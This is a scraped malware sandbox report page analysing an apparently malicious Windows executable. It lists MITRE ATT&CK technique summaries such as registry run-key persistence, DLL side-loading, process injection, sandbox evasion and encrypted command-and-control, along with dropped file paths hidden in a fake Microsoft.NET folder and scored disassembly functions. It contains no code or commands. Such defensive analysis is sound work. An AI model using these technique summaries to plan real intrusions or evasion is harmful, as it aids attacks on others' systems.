Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report leg#U00edvel9931-009-140.08372236.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIEDLL_64.dll

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe

C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\FrontendCybersecurity.json

C:\Users\user\Microsoft.NET\netframework4.7\version\ng3DJyCjjqIdyv.zip

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
leg#U00edvel9931-009-140.08372236.exe

Function 0000000180013480 Relevance: 109.3, APIs: 31, Strings: 31, Instructions: 757
networksleepwindowCOMMON

Function 00000001800170A0 Relevance: 46.2, APIs: 18, Strings: 8, Instructions: 736
threadfilesynchronizationCOMMON

Function 00000001800059D0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 141
windowregistryCOMMON

Function 00007FFE1A511800 Relevance: 25.9, APIs: 17, Instructions: 354
memoryCOMMON

Function 00007FFE1A513480 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
COMMON

Function 00007FFE1A530948 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMONLIBRARYCODE

Function 00000001800143F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110
COMMON

Function 00007FFE1A512DF0 Relevance: 3.2, APIs: 2, Instructions: 209
COMMON

Function 0000000180017CE0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61
libraryloaderthreadCOMMON

Function 00007FFE1A52782C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Function 00007FF6B40A199C Relevance: 9.1, APIs: 6, Instructions: 107
COMMON

Function 00007FFE1A511600 Relevance: 7.6, APIs: 5, Instructions: 110
libraryCOMMON

Function 0000000180044DDC Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Function 00007FFE1A516DD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre